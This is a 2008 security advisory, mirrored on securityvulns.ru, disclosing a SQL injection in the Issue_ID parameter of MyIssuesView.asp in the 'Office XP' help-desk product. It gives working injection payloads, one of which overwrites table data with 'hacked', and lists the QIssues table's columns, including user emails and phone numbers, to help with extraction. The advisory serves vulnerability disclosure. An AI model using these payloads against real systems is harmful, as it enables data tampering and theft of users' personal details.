Computer Security

Security Advisory: Office XP Remote SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities

  PR08-02: Plone CMS Security Research - the Art of Plowning

From:no-reply_(at)_aria-security.net <no-reply_(at)_aria-security.net>
Date:14.03.2008
Subject:Office XP Remote SQL Injection

Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Adivosry: http://forum.aria-security.com/showthread.php?p=21

PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]

Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--


List of columns

QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,
QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.
Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,
QIssues.UserFullName,QIssues.StaffFullName,QIssues.StaffEmail,QIssues.Type,
QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEmail,QIssues.GroupName,QIssues.
UserPhone,QIssues.CloseDate,QIssues.BrowserAgent,QIssues.CompanyName,QIssues.
FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age


Aria-Security Team
The-0utl4w
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru